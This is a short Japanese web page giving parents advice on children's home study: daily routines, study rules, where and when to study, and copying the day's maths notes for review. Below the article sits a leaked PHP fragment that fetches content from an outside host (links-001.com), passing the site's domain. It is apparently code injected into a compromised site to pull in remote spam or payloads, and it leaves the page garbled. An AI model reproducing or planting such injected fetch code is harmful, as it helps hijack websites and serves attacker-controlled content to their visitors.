前へ
次へ

家庭学習でのポイントを見てみよう

園児をはじめ、小学低学年から高学年までの年齢別で、生活習慣と学習習慣、マナーや体験学習などの教育環境には違いもあります。
例えば、生活習慣では基本的な生活習慣を各家庭でスタートします。
朝ご飯の大切さ、睡眠について、生活リズムの自己管理へと家庭教育が変化していきます。
学習習慣では、読み聞かせからスタートし、基本の学習習慣、家庭学習のルール、家庭学習の自己管理へと変化します。
家庭学習のルールを題材にあげるなら、毎日勉強をする、勉強する場所を決める、いつ・どのくらい勉強をするのかなどです。
自分ですると決めたら必ず守るあるいは守らせる、特に宿題はしっかりと取り組むことを重要視する教育者は少なくありません。
3年生より上の学年からは、例えば、その日学習したばかりの算数のノートを別ノートに写すなどで復習の効率化を図りましょう。
宿題がある日は宿題をするものの、ない日にもやる気スイッチはオンにすべきですから、復習問題はそれに当てはまります。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top